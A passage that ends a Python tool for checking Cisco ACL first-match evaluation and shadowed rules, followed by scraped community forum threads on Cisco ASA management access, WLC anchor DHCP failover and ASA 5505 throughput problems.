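            dport = t[i]  # ICMP type keyword (echo, echo-reply, ...) takes the port slot
        rules.append(Rule(lineno, t[2], t[3], src, sport, dst, dport))
    return rules


def _addr_match(spec, ip):
    addr, wild = spec
    care = ~wild & MASK
    return ip & care == addr & care


def _covers(outer, inner):
    """outer's address set is a superset of inner's: outer cares about no bit inner
    ignores, and the two agree on every bit outer cares about."""
    (oa, ow), (ia, iw) = outer, inner
    care = ~ow & MASK
    return iw & care == 0 and ia & care == oa & care


def evaluate(rules, proto, src, sport, dst, dport):
    """IOS semantics: first matching line wins; implicit deny if nothing matches."""
    for r in rules:
        if (r.proto == "ip" or r.proto == proto) and _addr_match(r.src, _ip(src)) \
                and _addr_match(r.dst, _ip(dst)) and r.sport in (None, sport) and r.dport in (None, dport):
            return r.action, r.line
    return "deny", None


def shadowed(rules):
    """Lines that can never match because an earlier line already covers all their traffic."""
    dead = []
    for i, r in enumerate(rules):
        for e in rules[:i]:
            if (e.proto == "ip" or e.proto == r.proto) and _covers(e.src, r.src) and _covers(e.dst, r.dst) \
                    and e.sport in (None, r.sport) and e.dport in (None, r.dport):
                dead.append(r.line)
                break
    return dead


def without_line(rules, line):
    return [r for r in rules if r.line != line]


RULES = parse_acl(SAMPLE_ACL, 102)

if __name__ == "__main__":
    print("dead lines with the catch-all:", shadowed(RULES))
    fixed = without_line(RULES, 2)
    print("dead lines without it:", shadowed(fixed))
    for flow in [("udp", "8.8.4.4", 53, "203.0.113.10", 40000), ("tcp", "8.8.4.4", 53, "203.0.113.10", 40000)]:
        print(flow, "->", evaluate(fixed, *flow))
```

Run against the constructed ACL, the catch-all marks lines 3 through 10 as dead; with it removed, a UDP reply from 8.8.4.4 port 53 is permitted by the DNS line, while the same reply over TCP falls through to the final deny, which is the kind of gap a stateless ACL on an outside interface leaves unless a return-traffic line or stateful inspection covers it.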
CISCO ASA config issue (Remote management ASDM/SSH/etc)
I can't ping the device from 10.23.1.x either; I can ping it on 10.23.2.x though.
I have a couple of ASA devices that I want to be able to manage across our network. I have two devices: Device A is 10.23.1.10, the other is on 10.23.2.10. If I remote into a machine on the 10.23.2.x network I can connect through SSH and ASDM, but on the 10.23.1.x network I cannot connect. I have the ASDM configured to accept connections from both networks. Any idea why it does not work? The remote ASA is on the local/inside network, just on a different subnet.
This topic first appeared in the Spiceworks Community -
Hi Cisco Support Community,
I am currently noticing some issues within my WiFi infrastructure.
Our infrastructure is setup with a 8510 WLC high availability cluster (AP SSO) and a 5508 WLC high availability cluster (AP SSO) as mobility anchor within the DMZ zone.
The issue I noticed is that if there is a switchover on the 5508 WLC high availability cluster the users wont be able to receive a DHCP IP address.
I already read some of the other threads regarding this topic. (About Mobility Anchor: Policy Manager State = DHCP_REQD) (DHCP Anchor controller problem.)
But unfortunately I was unable to find any solution for my issue.
We currently have three SSID´s with anchoring active and I have noticed that only the SSID´s with layer 3 security enabled are affected by this issue.
The one SSID with PSK and MAC Auth are not affected by this issue.
I already checked the configuration for the SSID´s between the main controller and the anchor controller the SSID´s are configured the same except the breakout interface.
Even the described SSID with PSK and MAC Auth configured uses the same breakout interface as one of our layer 3 security enabled SSID´s.
The configuration works so far only in case of failover the clients connected to one of the SSID´s with layer 3 security enabled are unable to receive a IP address by the DHCP server.
I also performed some troubleshooting for the client on the anchor side.
I added part of the troubleshooting outputs as workingssid.txt and notworkingssid.txt to this thread.
Maybe one of you guys have some advice for me to address the issue.
Thanks for your support in advance
With kind regards
Benedikt
As far as your L3 roaming is concerned, make sure you're using the latest and most stable firmware for the WLC.
Make sure the mobility groups are the same and configured on the WLCs before the switchover happens. If DHCP is outside the network, make sure option 43 is set and you are able to get an IP from both WLCs manually and able to ping. Make sure the AP-manager interface virtual IP is set. Make sure SSO is enabled on both controllers.
Check the following link also.
https://supportforums.cisco.com/discussion/11662541/layer-3-roaming-and-dhcp
Please confirm and mark it correct answer if your issue resolved. -
Cisco ASA 5505 performance issues on downloads - data into the ASA from the Internet
I am having serious issues with performance on my ASA 5505s that I am testing with 9.2.3 code.
I stripped the config and removed as much stuff as I could (no VPN etc.) and I am ONLY getting about 30-40Mbps downloads from sites but 95Mbps uploads. Anyone else seeing these problems? If I remove the firewall my PC can hit 300/300Mbps to the same sites using the same switch and cable.
I installed 1GB of memory on the ASA 5505 but it made no difference. The ASA has a UL IP Security license but I am only using an inside and outside address for these tests, no other ports configured.
Is anyone else seeing this performance problem with the 9.2.3 code? I went to this from 8.2.5 to try to resolve QOS failure bugs that I found in the 8.2.5 code. I did not expect to have a performance hit though and it is only on downloads TO the ASA from the Internet from all speed test sites that I try. Uploading speeds seem fine. No access-lists on my interfaces either...barebones config.
My FIOS and switch interfaces are fine...no errors on any interfaces and the same switch interface hits 300/300Mbps when my laptop is directly attached.
Anyone have a barebones config on their ASA 5505 that flies? I will try it on mine and see if some command somewhere (hidden) is causing the issue. I even cleared the config and started with a clean slate just in case I was missing some command from the older configs that may have impacted performance.
After changing the switch for a high-end switch my performance increased, but I am still not happy with the throughput out of my ASA. I have about 50+ ASA 5505s and a dozen 5510s. Most remote sites have 5505s. All my sites right now have 8.2.5-51 and I wanted to put 9.2.3 out there to solve issues I have uncovered on the 8.2.5 code with regard to QOS issues.
I get much better results using the Cisco 3750X attached to the FIOS (right around 300/300 with my laptop directly attached to the 3750X, bypassing the ASA; my FIOS circuit rating is also 300/300). Going through the ASA to the same test site I get download speeds of 35 to 75. It changes randomly, which really bothers me. My upload speeds are ALWAYS faster than my download speeds. Example: the best download I would ever get is 75Mb and my upload would usually hit 95Mb during the same test period.
I may have to live with it but the inconsistency is what really bothers me.
Here is the config I am currently using. Nothing going on during testing since only a single PC is attached. The VPN tunnel to the main site can be up or down; it doesn't seem to make any difference. The PC goes to the site directly from the outside interface of the ASA (split tunneling). Even when I removed the tunnels and tested with just the ASA as a firewall to the Internet I was still seeing the same inconsistencies.
Anything obviously missing - new command or anything? Xlates causing issues?